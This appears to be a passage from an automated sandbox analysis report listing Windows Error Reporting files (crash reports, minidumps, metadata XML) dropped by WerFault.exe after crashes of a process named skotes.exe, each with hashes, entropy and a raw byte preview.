Encrypted:	false
SSDEEP:	96:JcJRzU/sohqwoA7Jf9QXIDcQnc6rCcEhcw3rb+HbHgnoW6HeonsFEOyKZj8OWJqo:QzU/Et056rwjuUzuiFBZ24IO8nI
MD5:	331E7E072214A2719218C37BA0072E04
SHA1:	212BFBDF232EB5936E6018CDC573472C84536C52
SHA-256:	9B508F2F84D246766386DF4B6D50403044574A4A9003EADB0680C6273D6248EE
SHA-512:	B088327E8FD7A66E63C88541BBFAD8CD2D0B7C872D5051646D3033F317817A51BA8C9A1545097F3A20D601C1B613FD085BF62C3397B22F19EFD7DCE31835931E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.4.7.6.1.1.0.4.8.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.d.1.c.b.c.7.-.4.d.e.7.-.4.d.d.1.-.a.6.8.0.-.8.5.3.a.1.c.9.0.e.b.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.b.b.1.0.3.e.-.6.e.5.e.-.4.f.1.9.-.9.7.4.8.-.e.9.d.7.c.2.4.b.1.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.0.c.-.0.0.0.1.-.0.0.1.4.-.a.2.1.9.-.1.7.0.4.1.0.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.s.k.o.t.e.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_skotes.exe_aa21a44855daeec5317d1c87b7d7da242ddf3b1_360c380b_5664fff1-f605-4429-a159-fc69966ad3d3\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7735124672077787
Encrypted:	false
SSDEEP:	96:wCCgzUfsohqwC7ql9/QXIDcQzc6McE1cw3D+HbHg/8BRTf3o8Fa9OyRgEVsPiDHu:rRzUfEIA0dIPcj/jzuiFBZ24IO8nI
MD5:	2C3E62D96DEB18DF293431E8BA3BE235
SHA1:	7CE3C6B2277DE23A406037BB6E57E050B2FB8101
SHA-256:	8E718DB94BDDF437A3B4A57E61C7DE550CECFCB63D421CA0694E3B3C3B005A7D
SHA-512:	53AB5BC1D6EDF4225B0A13357E45A36CEAF2BC8078517E299DEA07AC231E9C737FDC2AE9700CDCF64A1C618DB5FA833D982463F9F964C6A463B307A182CF9D27
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.1.7.3.4.5.0.7.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.1.7.5.1.8.7.5.1.3.1.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.6.4.f.f.f.1.-.f.6.0.5.-.4.4.2.9.-.a.1.5.9.-.f.c.6.9.9.6.6.a.d.3.d.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.c.3.d.9.8.a.-.0.d.3.0.-.4.2.6.6.-.a.3.c.3.-.8.6.f.6.f.3.c.7.1.8.4.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.k.o.t.e.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.2.c.-.0.0.0.1.-.0.0.1.4.-.b.4.0.c.-.a.5.f.2.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.0.9.4.f.c.a.3.8.0.6.f.4.3.a.4.e.8.9.f.f.7.1.6.0.8.9.0.f.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.s.k.o.t.e.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER174B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	54540
Entropy (8bit):	1.9783614181114337
Encrypted:	false
SSDEEP:	192:2RrYURXP6GJGObPMpOv+CLTYCAxdwD9ODiiwP1sk3qLZIUHIDjz0BjM:mz6GJRbnHiJhNofm
MD5:	351BC2016E1953732DBE86F008EA783D
SHA1:	6E04A09FC1C5A81A8447675E9DFDE2A51F52AF6C
SHA-256:	8E4A058F21791BAA96A720659DB001A15721E4FF5A27F06D998D40522829D48F
SHA-512:	90CC411F18F3A362D3ECA0FED87CBB4515564D365CFAB01C6E3769D45296A2B98B81EA7868927CFF77BA933910570E78FAF32106BFBA35F083E38FD02BE14D6F
Malicious:	false
Preview:	MDMP..a..... .......~..f........................\...........<...d.......................`.......8...........T...............<.......................................................................................................eJ......$.......GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1826.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8346
Entropy (8bit):	3.7089928129528844
Encrypted:	false
SSDEEP:	192:R6l7wVeJVe6MNJvl6YS6SUG4ugmf4QpBY89bYSsfMom:R6lXJM6+vl6Y/SUG4ugmf4KYRfy
MD5:	4F67638008F057559C778E8871910D2E
SHA1:	C10CD87F39D3A3BF11986793259F338DB2F93EA0
SHA-256:	392902771498025729CB5E2F59E5F64DADD936B704C191E2172F8DAE18B0ED36
SHA-512:	97F2F23EAAB4D73889389CA97C0C03E56C2E97B086C093873DFBA4E0181493D1C9DAC214104B972C0B3F52E3BBEA051E5EA255CABE5859262E008B9CE114EB50
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1856.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.509151179979443
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjpEYm8M4JQJKFDl+q8+p1nXlGfd:uIjfxI7j37VWxJQAlt1nXlGfd
MD5:	D754BC01C5DB916E221467074EF9608D
SHA1:	FF1DF2C2CD72F6F3DCBF987402C8E9F8853BC919
SHA-256:	1A820B89E1B774E4734F743523271F1C89B57E2B5E7744CB8C40A3682D4A978D
SHA-512:	6C7FED2BF827E462E8A47C889EB2CDB9A5A78E5B6851409EE9383152FFE0C931F076C1A6245BB3094A2B32B879F703491819989AAE43376549C0FC50C7A63C99
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AE5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:22 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	2.086478714514486
Encrypted:	false
SSDEEP:	192:2O7mlXuaVJ+a19ObPhUrCy1LC05mc0pKDHST8BHVWkdRzoiiwP1s+3qLXIIqoIVe:1PaVJ+5bpU70cwK2aYXri7Zg
MD5:	00837A360DEE64963449949E5250F3EE
SHA1:	EB9B24DA5470BDFD78166614B0F4E19EB3C147D8
SHA-256:	05C21A0FFDDB95094FE2B507EA27D996DE61EB9B070F75FAD8EC668E3D6A2BF1
SHA-512:	73246FFAC8B3A773884AF1BB826C7B988EF7BF9C863E60D4DBDBE3DFFB065AC158B6B27A0C24A2EE9267C86017241D45F7E775121BB57E8B47F0FDCDA543BBAB
Malicious:	false
Preview:	MDMP..a..... .......~..f............$...............8.......<...........$....2..........`.......8...........T...............P.......................................................................................................eJ..............GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B53.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8344
Entropy (8bit):	3.7091865683025103
Encrypted:	false
SSDEEP:	192:R6l7wVeJVO6h6YS2SU0gmf4QpBT89bhSsfnvrm:R6lXJ86h6YzSU0gmf4ThRf6
MD5:	6D92E65A218D337E531B9BBF6C081E3F
SHA1:	880A83F339C647A598F194CB7A258DAC9F0F10B7
SHA-256:	D4B60D9E4885C04583A4668CD7B2AC9735166C57CD6A29FB6C4E690EC87B2102
SHA-512:	38FB8E737D6F99560E086F9A72F974E8EACA3EA1153AAD828645AEF93084C598ED25389613C85FF0E03C473DA9BA1EA22F06586CE809A1B5E9A11A5EE57394B7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B83.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.508254159802511
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjpGeYm8M4JQJKFx+q8+p1nXlGfd:uIjfxI7j37VWGXJQ8t1nXlGfd
MD5:	B493D5DF4FADAF235A944AFF281E77AD
SHA1:	4F9BFC51D67E5294E6E871C0D800548C125B2A15
SHA-256:	DABF275297659D4BCF1D5A6520DFD5CCB02587985CE7E8116300EBF2DF57C56C
SHA-512:	ED3C454A51E432EDC328D39581D83A5DD262FAF6264D5FA6A2FA0F6E2CC8FC85A6CA667ECEC2E1252103F0582E51CB7DCA47AC42BFAB388620DB692C538124A5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DA4.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	83158
Entropy (8bit):	1.95440519668437
Encrypted:	false
SSDEEP:	192:LZRI6fi1XoODvx8GDuObPhOBHLZt397CyJfFCwZD5gYb4n+AxQczoiiwP1s+3qLf:DI6pODvZDpbporZt3ZdWrxwXJ28GCYt
MD5:	B6844B2BA5697B9590AD4ED7726D6366
SHA1:	88AAE5B9EE215A6390163F93700575C89A54EDEB
SHA-256:	012C1F60BA7D40921B4E43611C5924558E751278DEFC0B6FEED3E3961A87FC0D
SHA-512:	62B0E46579E5B419F56D55D9AE35E398582C23156FB3DD7D49299237E40D86097352935CCAB4055D392667DDE8B8A041C951C01AF1E33113BD18AA1C1C3806AE
Malicious:	false
Preview:	MDMP..a..... ..........f........................x...........<...@.......t....<..........`.......8...........T...........H"..."..........\|...........h...............................................................................eJ..............GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E8F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.708460998975714
Encrypted:	false
SSDEEP:	192:R6l7wVeJVw6I546YSqSUvMfgmf4QpBM89bhSsf4rm:R6lXJC6I546YPSUv8gmf4+hRfZ
MD5:	0667D6D0051BD68CD4972358BA537C97
SHA1:	3FBB82E961D8C51E2577E45E95D99E2C79D04C63
SHA-256:	6A3CB1C02658DE7C6DC985097DFBCBC628EBB31E3CA14A32E11141193AA22953
SHA-512:	45D0BDF11C03CDEF8B5FF4A6757A156FE19F8A236F1D55F92B1050D62FEC2929056605E55BE7CEAB71F17FABAC126C10AB20227AC12DF00B3559A1AE8EA9D8F0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1EAF.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.509591782000133
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjpuYm8M4JQJKFy+q8+p1nXlGfd:uIjfxI7j37VWHJQbt1nXlGfd
MD5:	81BB2D52C854886984ED7801DEACA69F
SHA1:	49E6A0451B1B48C793D538B97CCFE37EA7A88C97
SHA-256:	266AD0DCF1C2524208179C0CC6556DABD2E07DB5FE157BAA644D5474BA58FDDD
SHA-512:	F2F510533D15AE86F392CF73543B7A64AEBC9CA4A1C731C27A81678E2DD625C9A2D958CB9802917D69947E09592902A36DB96593309CBE04043CC2BF7B3A5289
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2295.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	87184
Entropy (8bit):	2.079947067401806
Encrypted:	false
SSDEEP:	384:VoJODv8zpbp8NZt3Z/qGQsxxwXufgUDb4:uJcU9bp8ZtpqGY+TD
MD5:	8B83ABFDBB4FB56DCE64D6E22DA3D069
SHA1:	665F3FC2F28C0A2E8C424C1F6E14BE5476688E4D
SHA-256:	F08FF41AE8F32BA0E25E401D87302BB8683BFC85324C612B87E50837DC046361
SHA-512:	81C0AA99D632F2BFA4348921B571136C9E207F53CB7F5BC39AD6D380CB134EEF35ABD239817EF447B086CBF015C2D3DA7CC69D8CF5142AAC96EDF794F0F64C36
Malicious:	false
Preview:	MDMP..a..... ..........f........................x...........<...@............<..........`.......8...........T............"...1..........\|...........h...............................................................................eJ..............GenuineIntel............T...........x..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2342.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8350
Entropy (8bit):	3.7102961167940687
Encrypted:	false
SSDEEP:	192:R6l7wVeJVj6I5s6YSiSUvMfgmf4QpBp89b3SsfWdm:R6lXJx6I5s6YXSUv8gmf4B3Rf9
MD5:	1DBF0C355F1DBBD2340D87BC95A18789
SHA1:	570E48CEC0CA657239A3F7E5BF08971ED39D6B18
SHA-256:	982F7D779D3C7EA20AB13D64F44D1F162BD1BB0E8A795FD62EB281E07126837F
SHA-512:	A508BE89EABD38F7FB3B1A1E10E384C30ADD4E2F1C84D26BB182F6ACBD85E61848CC66F998E97E31BCBD66EEEB23EC5C7EF7A23999FC62A3D5967D19B3A05850
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2362.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.506921293499616
Encrypted:	false
SSDEEP:	48:cvIwWl8zsPJg77aI9ZWWpW8VYjp7Ym8M4JQJKFU+q8+p1nXlGfd:uIjfxI7j37VWeJQNt1nXlGfd
MD5:	4FF6B9FB9E8596F233D6B23F8498B76D
SHA1:	26EF73054E7611A06FD9FC30D88598174A11790B
SHA-256:	10EFF3610DD03D25EC1D0A0FC201BC8CF65BDFD75E92E7DFDB3EE5FAA161B8E3
SHA-512:	DA5E5820A7B8CDF9B26FB430B40B547ED6D57D9343B48B85AB3CBE3272F3372AC1BCB9DA9BD4B5620457CBF4EEB9964C4668807038D9F0EBD4176E029B66F75F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="515341" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2564.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Sep 25 05:58:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	82616
Entropy (8bit):	1.9969804441559862
Encrypted:	false
SSDEEP:	192:50aEzZXrf+PodnMuObPhOz1mBP0uLf397Cm6sMEzPosCwZDW4nscAxQczoiiwP1m:/if+PQMpbpUmBPXf31nRsxxwXfeW/Y
MD5:	23B977B23D33D2785FBF31DA47D05A97
SHA1:	247729E84E472DEF63D38D182DE955F932787CEF
SHA-256:	161E15B759E6BB3F6DD94E4C83BEEF39C3B19A4010A4CBD17E7AC48FB18AF459
